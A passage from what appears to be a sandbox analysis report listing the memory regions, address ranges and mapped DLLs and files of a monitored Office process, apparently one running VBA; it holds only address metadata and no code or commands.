"private_0x000000000ce40000" filename = "" Region: id = 512 start_va = 0xfb60000 end_va = 0xfd46fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000fb60000" filename = "" Region: id = 513 start_va = 0xfb60000 end_va = 0xff25fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000fb60000" filename = "" Region: id = 514 start_va = 0xff30000 end_va = 0x102fbfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000ff30000" filename = "" Region: id = 515 start_va = 0xce40000 end_va = 0xd024fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000ce40000" filename = "" Region: id = 516 start_va = 0xfb60000 end_va = 0xfd4dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000fb60000" filename = "" Region: id = 517 start_va = 0xce40000 end_va = 0xd103fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000ce40000" filename = "" Region: id = 518 start_va = 0xfb60000 end_va = 0xfe29fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000fb60000" filename = "" Region: id = 519 start_va = 0xfe30000 end_va = 0xff97fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000fe30000" filename = "" Region: id = 520 start_va = 0xce40000 end_va = 0xcfa0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000ce40000" filename = "" Region: id = 521 start_va = 0xfb60000 end_va = 0xff28fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000fb60000" filename = "" Region: id = 522 start_va = 0xff30000 end_va = 0x102f5fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000ff30000" filename = "" Region: id = 523 start_va = 0x10300000 end_va = 0x104ecfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000010300000" filename = "" Region: id = 524 start_va = 0xfb60000 end_va = 0xfd49fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000fb60000" filename = "" Region: id = 525 start_va = 0xfd50000 end_va = 0x10019fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000fd50000" filename = "" Region: id = 526 start_va = 0x10020000 end_va = 0x103f0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000010020000" filename = "" Region: id = 527 start_va = 0x10400000 end_va = 0x107fffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000010400000" filename = "" Region: id = 528 start_va = 0x2420000 end_va = 0x249ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "~wrf{624bfc28-2bcb-4090-8147-ffcbd4f0d53f}.tmp" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\INetCache\\Content.Word\\~WRF{624BFC28-2BCB-4090-8147-FFCBD4F0D53F}.tmp" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\inetcache\\content.word\\~wrf{624bfc28-2bcb-4090-8147-ffcbd4f0d53f}.tmp") Region: id = 529 start_va = 0x69130000 end_va = 0x693aefff monitored = 1 entry_point = 0x691cbfb8 region_type = mapped_file name = "vbe7.dll" filename = "\\PROGRA~2\\COMMON~1\\MICROS~1\\VBA\\VBA7.1\\VBE7.DLL" (normalized: "c:\\program files (x86)\\common~1\\micros~1\\vba\\vba7.1\\vbe7.dll") Region: id = 530 start_va = 0x6f7a0000 end_va = 0x6f85efff monitored = 0 entry_point = 0x6f7b1dfc region_type = mapped_file name = "msvcr100.dll" filename = "\\Windows\\SysWOW64\\msvcr100.dll" (normalized: "c:\\windows\\syswow64\\msvcr100.dll") Region: id = 531 start_va = 0xcaa0000 end_va = 0xcb6ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000caa0000" filename = "" Region: id = 532 start_va = 0x24a0000 end_va = 0x24a3fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 533 start_va = 0x8210000 end_va = 0x8254fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x000000000000000c.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x000000000000000c.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x000000000000000c.db") Region: id = 534 start_va = 0x24b0000 end_va = 0x24b3fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 535 start_va = 0xcaa0000 end_va = 0xcb2dfff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000001.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{DDF571F2-BE98-426D-8288-1A9A39C3FDA2}.2.ver0x0000000000000001.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000001.db") Region: id = 536 start_va = 0xcb60000 end_va = 0xcb6ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000cb60000" filename = "" Region: id = 537 start_va = 0x8260000 end_va = 0x8270fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "propsys.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\propsys.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\propsys.dll.mui") Region: id = 538 start_va = 0x8280000 end_va = 0x8281fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000008280000" filename = "" Region: id = 539 start_va = 0x8290000 end_va = 0x8291fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000008290000" filename = "" Region: id = 540 start_va = 0x82a0000 end_va = 0x82a0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000082a0000" filename = "" Region: id = 541 start_va = 0xce40000 end_va = 0xcf26fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "calibri.ttf" filename = "\\Windows\\Fonts\\calibri.ttf" (normalized: "c:\\windows\\fonts\\calibri.ttf") Region: id = 542 start_va = 0xcf30000 end_va = 0xd00cfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "calibrib.ttf" filename = "\\Windows\\Fonts\\calibrib.ttf" (normalized: "c:\\windows\\fonts\\calibrib.ttf") Region: id = 543 start_va = 0x10800000 end_va = 0x109fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000010800000" filename = "" Region: id = 544 start_va = 0x6f680000 end_va = 0x6f79bfff monitored = 0 entry_point = 0x6f6e74f0 region_type = mapped_file name = "uiautomationcore.dll" filename = "\\Windows\\SysWOW64\\UIAutomationCore.dll" (normalized: "c:\\windows\\syswow64\\uiautomationcore.dll") Region: id = 545 start_va = 0x6f660000 end_va = 0x6f678fff monitored = 0 entry_point = 0x6f6647e0 region_type = mapped_file name = "userenv.dll" filename = "\\Windows\\SysWOW64\\userenv.dll" (normalized: "c:\\windows\\syswow64\\userenv.dll") Region: id = 546 start_va = 0x82a0000 end_va = 0x82a0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000082a0000" filename = "" Region: id = 547 start_va = 0x82b0000 end_va = 0x82bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000082b0000" filename = "" Region: id = 548 start_va = 0x82b0000 end_va = 0x82bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000082b0000" filename = "" Region: id = 549 start_va = 0x10a00000 end_va = 0x10dbcfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000010a00000" filename = "" Region: id = 550 start_va = 0x10dc0000 end_va = 0x1117cfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000010dc0000" filename = "" Region: id = 551 start_va = 0x7fe90000 end_va = 0x7fe9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fe90000" filename = "" Region: id = 552 start_va = 0xd010000 end_va = 0xd10ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000d010000" filename = "" Region: id = 553 start_va = 0x82b0000 end_va = 0x82bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000082b0000" filename = "" Region: id = 554 start_va = 0xcb30000 end_va = 0xcb3ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000cb30000" filename = "" Region: id = 555 start_va = 0xcb30000 end_va = 0xcb3ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000cb30000" filename = "" Region: id = 556 start_va = 0xcb40000 end_va = 0xcb4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000cb40000" filename = "" Region: id = 557 start_va = 0xfb60000 end_va = 0xfbf8fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000fb60000" filename = "" Region: id = 558 start_va = 0xcb40000 end_va = 0xcb4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000cb40000" filename = "" Region: id = 559 start_va = 0xcb50000 end_va = 0xcb5ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000cb50000" filename = "" Region: id = 560 start_va = 0xcb50000 end_va = 0xcb5ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000cb50000" filename = "" Region: id = 561 start_va = 0xcb70000 end_va = 0xcb7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000cb70000" filename = "" Region: id = 562 start_va = 0xcb80000 end_va = 0xcb8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000cb80000" filename = "" Region: id = 563 start_va = 0xcb90000 end_va = 0xcb9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000cb90000" filename = "" Region: id = 564 start_va = 0x76b50000 end_va = 0x76b54fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "normaliz.dll" filename = "\\Windows\\SysWOW64\\normaliz.dll" (normalized: "c:\\windows\\syswow64\\normaliz.dll") Region: id = 565 start_va = 0xcb70000 end_va = 0xcb81fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "normidna.nls" filename = "\\Windows\\System32\\normidna.nls" (normalized: "c:\\windows\\system32\\normidna.nls") Region: id = 566 start_va = 0x6f8a0000 end_va = 0x6f8aafff monitored = 0 entry_point = 0x6f8a2150 region_type = mapped_file name = "linkinfo.dll" filename = "\\Windows\\SysWOW64\\linkinfo.dll" (normalized: "c:\\windows\\syswow64\\linkinfo.dll") Region: id = 567 start_va = 0xcb90000 end_va = 0xcb90fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000000cb90000" filename = "" Region: id = 568 start_va = 0x69060000 end_va = 0x69128fff monitored = 0 entry_point = 0x69073180 region_type = mapped_file name = "ntshrui.dll" filename = "\\Windows\\SysWOW64\\ntshrui.dll" (normalized: "c:\\windows\\syswow64\\ntshrui.dll") Region: id = 569 start_va = 0xcba0000 end_va = 0xcba0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000000cba0000" filename = "" Region: id = 570 start_va = 0x6f880000 end_va = 0x6f89bfff monitored = 0 entry_point = 0x6f884720 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\SysWOW64\\srvcli.dll" (normalized: "c:\\windows\\syswow64\\srvcli.dll") Region: id = 571 start_va = 0x6f870000 end_va = 0x6f87efff monitored = 0 entry_point = 0x6f873f00 region_type = mapped_file name = "cscapi.dll" filename = "\\Windows\\SysWOW64\\cscapi.dll" (normalized: "c:\\windows\\syswow64\\cscapi.dll") Region: id = 572 start_va = 0xcba0000 end_va = 0xcba0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000000cba0000" filename = "" Region: id = 573 start_va = 0xfc00000 end_va = 0xfd00fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000fc00000" filename = "" Region: id = 574 start_va = 0xfc00000 end_va = 0xfd00fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000fc00000" filename = "" Region: id = 575 start_va = 0xfc00000 end_va = 0xfd00fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000fc00000" filename = "" Region: id = 576 start_va = 0xcba0000 end_va = 0xcba0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000000cba0000" filename = "" Region: id = 577 start_va = 0xfc00000 end_va = 0xfd00fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000fc00000" filename = "" Region: id = 578 start_va = 0xfc00000 end_va = 0xfd00fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000fc00000" filename = "" Region: id = 579 start_va = 0x70a00000 end_va = 0x70a40fff monitored = 0 entry_point = 0x70a07fe0 region_type = mapped_file name = "dataexchange.dll" filename = "\\Windows\\SysWOW64\\DataExchange.dll" (normalized: "c:\\windows\\syswow64\\dataexchange.dll") Region: id = 580 start_va = 0xcba0000 end_va = 0xcbaffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000000cba0000" filename = "" Region: id = 581 start_va = 0x68fd0000 end_va = 0x69050fff monitored = 0 entry_point = 0x68feb260 region_type = mapped_file name = "sxs.dll" filename = "\\Windows\\SysWOW64\\sxs.dll" (normalized: "c:\\windows\\syswow64\\sxs.dll") Region: id = 582 start_va = 0xfc00000 end_va = 0xfce0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "msword.olb" filename = "\\Program Files (x86)\\Microsoft Office\\Office16\\MSWORD.OLB" (normalized: "c:\\program files (x86)\\microsoft office\\office16\\msword.olb") Region: id = 583 start_va = 0x11180000 end_va = 0x113a5fff monitored = 1 entry_point = 0x1118e058 region_type = mapped_file name = "vbeui.dll" filename = "\\Program Files (x86)\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\VBEUI.DLL" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\vba\\vba7.1\\vbeui.dll") Region: id = 584 start_va = 0x68d90000 end_va = 0x68fc0fff monitored = 1 entry_point = 0x68d9e058 region_type = mapped_file name = "vbeui.dll" filename = "\\Program Files (x86)\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\VBEUI.DLL" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\vba\\vba7.1\\vbeui.dll") Region: id = 585 start_va = 0xcba0000 end_va = 0xcba1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000000cba0000" filename = "" Region: id = 586 start_va = 0x74c00000 end_va = 0x74c41fff monitored = 0 entry_point = 0x74c16f10 region_type = mapped_file name = "wintrust.dll" filename = "\\Windows\\SysWOW64\\wintrust.dll" (normalized: "c:\\windows\\syswow64\\wintrust.dll") Region: id = 587 start_va = 0x764c0000 end_va = 0x764cdfff monitored = 0 entry_point = 0x764c5410 region_type = mapped_file name = "msasn1.dll" filename = "\\Windows\\SysWOW64\\msasn1.dll" (normalized: "c:\\windows\\syswow64\\msasn1.dll") Region: id = 588 start_va = 0x73f90000 end_va = 0x74107fff monitored = 0 entry_point = 0x73fe8a90 region_type = mapped_file name = "crypt32.dll" filename = "\\Windows\\SysWOW64\\crypt32.dll" (normalized: "c:\\windows\\syswow64\\crypt32.dll") Region: id = 589 start_va = 0xcbb0000 end_va = 0xcbbffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000cbb0000" filename = "" Region: id = 590 start_va = 0xfcf0000 end_va = 0xfd15fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "vbe7intl.dll" filename = "\\Program Files (x86)\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\1033\\VBE7INTL.DLL" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\vba\\vba7.1\\1033\\vbe7intl.dll") Region: id = 591 start_va = 0xcbc0000 end_va = 0xcbcafff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "normnfd.nls" filename = "\\Windows\\System32\\normnfd.nls" (normalized: "c:\\windows\\system32\\normnfd.nls") Region: id = 592 start_va = 0xcbd0000 end_va = 0xcbd6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000cbd0000" filename = "" Region: id = 593 start_va = 0x6f860000 end_va = 0x6f86cfff monitored = 0 entry_point = 0x6f863520 region_type = mapped_file name = "wbemprox.dll" filename = "\\Windows\\SysWOW64\\wbem\\wbemprox.dll" (normalized: "c:\\windows\\syswow64\\wbem\\wbemprox.dll") Region: id = 594 start_va = 0x68d20000 end_va = 0x68d86fff monitored = 0 entry_point = 0x68d3b610 region_type = mapped_file name = "wbemcomn.dll" filename = "\\Windows\\SysWOW64\\wbemcomn.dll" (normalized: "c:\\windows\\syswow64\\wbemcomn.dll") Region: id = 595 start_va = 0xd110000 end_va = 0xd11ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000000d110000" filename = "" Region: id = 596 start_va = 0xd110000 end_va = 0xd110fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000d110000" filename = "" Region: id = 597 start_va = 0xfd20000 end_va = 0xfd3ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000fd20000" filename = "" Region: id = 598 start_va = 0xdd80000 end_va = 0xdd82fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000dd80000" filename = "" Region: id = 599 start_va = 0xfd40000 end_va = 0xfd43fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000fd40000" filename = "" Region: id = 600 start_va = 0x11180000 end_va = 0x11180fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000011180000" filename = "" Region: id = 601 start_va = 0x11190000 end_va = 0x11190fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000011190000" filename = "" Region: id = 602 start_va = 0x111a0000 end_va = 0x111a3fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000111a0000" filename = "" Region: id = 603 start_va = 0x111b0000 end_va = 0x111cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000111b0000" filename = "" Region: id = 604 start_va = 0x111d0000 end_va = 0x111d2fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000111d0000" filename = "" Region: id = 605 start_va = 0x111e0000 end_va = 0x111f4fff monitored = 1 entry_point = 0x1127bfb8 region_type = mapped_file name = "vbe7.dll" filename = "\\Program Files (x86)\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\VBE7.DLL" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\vba\\vba7.1\\vbe7.dll") Region: id = 606 start_va = 0x11200000 end_va = 0x11204fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "stdole2.tlb" filename = "\\Windows\\SysWOW64\\stdole2.tlb" (normalized: "c:\\windows\\syswow64\\stdole2.tlb") Region: id = 607 start_va = 0x11210000 end_va = 0x1128bfff monitored = 0 entry_point = 0x11211000 region_type = mapped_file name = "mso.dll" filename = "\\Program Files (x86)\\Common Files\\Microsoft Shared\\OFFICE16\\MSO.DLL" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\office16\\mso.dll") Region: id = 608 start_va = 0x11290000 end_va = 0x11293fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000011290000" filename = "" Region: id = 609 start_va = 0x112a0000 end_va = 0x112a3fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000112a0000" filename = "" Region: id = 610 start_va = 0x112b0000 end_va = 0x112b2fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000112b0000" filename = "" Region: id = 611 start_va = 0x6f640000 end_va = 0x6f650fff monitored = 0 entry_point = 0x6f648fa0 region_type = mapped_file name = "wbemsvc.dll" filename = "\\Windows\\SysWOW64\\wbem\\wbemsvc.dll" (normalized: "c:\\windows\\syswow64\\wbem\\wbemsvc.dll") Region: id = 612 start_va = 0x112c0000 end_va = 0x112fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000112c0000" filename = "" Region: id = 613 start_va = 0x11300000 end_va = 0x113fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000011300000" filename = "" Region: id = 614 start_va = 0x68c60000 end_va = 0x68d1efff monitored = 0 entry_point = 0x68c91e80 region_type = mapped_file name = "fastprox.dll" filename = "\\Windows\\SysWOW64\\wbem\\fastprox.dll" (normalized: "c:\\windows\\syswow64\\wbem\\fastprox.dll") Region: id = 615 start_va = 0x11400000 end_va = 0x11403fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000011400000" filename = "" Region: id = 616 start_va = 0x11410000 end_va = 0x1142ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000011410000" filename = "" Region: id = 617 start_va = 0x11430000 end_va = 0x11432fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000011430000" filename = "" Region: id = 618 start_va = 0x11440000 end_va = 0x11445fff monitored = 1 entry_point = 0x114dbfb8 region_type = mapped_file name = "vbe7.dll" filename = "\\Program Files (x86)\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\VBE7.DLL" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\vba\\vba7.1\\vbe7.dll") Region: id = 619 start_va = 0x11450000 end_va = 0x11453fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000011450000" filename = "" Region: id = 620 start_va = 0x11450000 end_va = 0x1148ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000011450000" filename = "" Region: id = 621 start_va = 0x11490000 end_va = 0x1158ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000011490000" filename = "" Region: id = 622 start_va = 0x11590000 end_va = 0x11593fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000011590000" filename = "" Region: id = 623 start_va = 0x115a0000 end_va = 0x115a3fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000115a0000" filename = "" Region: id = 624 start_va = 0xd150000 end_va = 0xd554fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000d150000" filename = "" Region: id = 625 start_va = 0xd560000 end_va = 0xd96bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000d560000" filename = "" Region: id = 626 start_va = 0xd970000 end_va = 0xdd7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000d970000" filename = "" Region: id = 627 start_va = 0x115b0000 end_va = 0x11875fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000115b0000" filename = "" Region: id = 628 start_va = 0x11880000 end_va = 0x1188ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000011880000" filename = "" Region: id = 629 start_va = 0x11880000 end_va = 0x119ecfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000011880000" filename = "" Region: id = 630 start_va = 0x71200000 end_va = 0x71212fff monitored = 0 entry_point = 0x71209950 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\SysWOW64\\cryptsp.dll" (normalized: "c:\\windows\\syswow64\\cryptsp.dll") Region: id = 631 start_va = 0x70230000 end_va = 0x7025efff monitored = 0 entry_point = 0x702495e0 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll") Region: id = 632 start_va = 0x119f0000 end_va = 0x11b59fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000119f0000" filename = "" Region: id = 633 start_va = 0x11880000 end_va = 0x119e7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000011880000" filename = "" Region: id = 634 start_va = 0x119f0000 end_va = 0x11b53fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000119f0000" filename = "" Region: id = 635 start_va = 0x11880000 end_va = 0x119eefff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000011880000" filename = "" Region: id = 636 start_va = 0x68b10000 end_va = 0x68c5dfff monitored = 0 entry_point = 0x68b53000 region_type = mapped_file name = "comsvcs.dll" filename = "\\Windows\\SysWOW64\\comsvcs.dll" (normalized: "c:\\windows\\syswow64\\comsvcs.dll") Region: id = 637 start_va = 0x6f610000 end_va = 0x6f632fff monitored = 0 entry_point = 0x6f617b50 region_type = mapped_file name = "wshom.ocx" filename = "\\Windows\\SysWOW64\\wshom.ocx" (normalized: "c:\\windows\\syswow64\\wshom.ocx") Region: id = 638 start_va = 0x68af0000 end_va = 0x68b05fff monitored = 0 entry_point = 0x68af21d0 region_type = mapped_file name = "mpr.dll" filename = "\\Windows\\SysWOW64\\mpr.dll" (normalized: "c:\\windows\\syswow64\\mpr.dll") Region: id = 639 start_va = 0x68ac0000 end_va = 0x68aeafff monitored = 0 entry_point = 0x68ac9a70 region_type = mapped_file name = "scrrun.dll" filename = "\\Windows\\SysWOW64\\scrrun.dll" (normalized: "c:\\windows\\syswow64\\scrrun.dll") Region: id = 640 start_va = 0x115b0000 end_va = 0x115bcfff monitored = 0 entry_point = 0x115b7b50 region_type = mapped_file name = "wshom.ocx" filename = "\\Windows\\SysWOW64\\wshom.ocx" (normalized: "c:\\windows\\syswow64\\wshom.ocx") Region: id = 641 start_va = 0x115b0000 end_va = 0x11730fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000115b0000" filename = "" Region: id = 642 start_va = 0x119f0000 end_va = 0x11b79fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000119f0000" filename = "" Region: id = 643 start_va = 0x68720000 end_va = 0x68ab0fff monitored = 0 entry_point = 0x689d35b0 region_type = mapped_file name = "d3dcompiler_47.dll" filename = "\\Windows\\SysWOW64\\D3DCompiler_47.dll" (normalized: "c:\\windows\\syswow64\\d3dcompiler_47.dll") Region: id = 644 start_va = 0x115b0000 end_va = 0x116affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000115b0000" filename = "" Region: id = 645 start_va = 0x116b0000 end_va = 0x116bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000116b0000" filename = "" Region: id = 646 start_va = 0x116c0000 end_va = 0x116cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000116c0000" filename = "" Region: id = 647 start_va = 0x116d0000 end_va = 0x116dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000116d0000" filename = "" Region: id = 648 start_va = 0x7fe80000 end_va = 0x7fe8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fe80000" filename = "" Region: id = 649 start_va = 0x116e0000 end_va = 0x116effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000116e0000" filename = "" Region: id = 650 start_va = 0x116f0000 end_va = 0x117effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000116f0000" filename = "" Region: id = 651 start_va = 0x117f0000 end_va = 0x117fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000117f0000" filename = "" Region: id = 652 start_va = 0x11800000 end_va = 0x1180ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000011800000" filename = "" Region: id = 653 start_va = 0x11810000 end_va = 0x1181ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000011810000" filename = "" Region: id = 654 start_va = 0x11820000 end_va = 0x1182ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000011820000" filename = "" Region: id = 655 start_va = 0x11b80000 end_va = 0x11c18fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000011b80000" filename = "" Region: id = 656 start_va = 0x11830000 end_va = 0x1183ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000011830000" filename = "" Region: id = 657 start_va = 0x11840000 end_va = 0x1184ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000011840000" filename = "" Region: id = 658 start_va = 0x11850000 end_va = 0x1185ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000011850000" filename = "" Region: id = 659 start_va = 0x11860000 end_va = 0x1186ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000011860000" filename = "" Region: id = 660 start_va = 0x11820000 end_va = 0x1182ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000011820000" filename = "" Region: id = 661 start_va = 0x11830000 end_va = 0x1183ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000011830000" filename = "" Region: id = 662 start_va = 0x11840000 end_va = 0x1184ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000011840000" filename = "" Region: id = 663 start_va = 0x11850000 end_va = 0x1185ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000011850000" filename = "" Region: id = 664 start_va = 0x11860000 end_va = 0x1186ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000011860000" filename = "" Region: id = 665 start_va = 0x11870000 end_va = 0x1187ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000011870000" filename = "" Region: id = 666 start_va = 0x11870000 end_va = 0x1187ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000011870000" filename = "" Region: id = 667 start_va = 0x11c20000 end_va = 0x11c2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000011c20000" filename = "" Region: id = 668 start_va = 0x11c30000 end_va = 0x11c3ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000011c30000" filename = "" Region: id = 669 start_va = 0x11c40000 end_va = 0x11c4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000011c40000" filename = "" Region: id = 670 start_va = 0x11c50000 end_va = 0x11c5ffff monitored = 1 entry_point = 0x0 region_type = 